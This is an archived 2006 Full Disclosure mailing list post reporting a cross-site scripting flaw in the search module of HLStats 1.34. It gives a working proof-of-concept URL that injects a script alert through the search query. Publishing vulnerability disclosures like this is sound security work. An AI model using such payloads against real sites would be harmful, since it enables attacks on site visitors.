Full Disclosure mailing list archives
XSS in HLStats 1.34
From: kefka <kefka () kevinbeardsucks com>
Date: Tue, 29 Aug 2006 03:47:29 -0400
Cross-site Scripting Vulnerability in HLStats 1.34 hlstats.php?mode=search&game=cstrike&st=player&q=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E%22 Search module fails to sanitize quotes. kefka kefka () kevinbeardsucks com Thanks to RSnake _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- XSS in HLStats 1.34 kefka (Aug 29)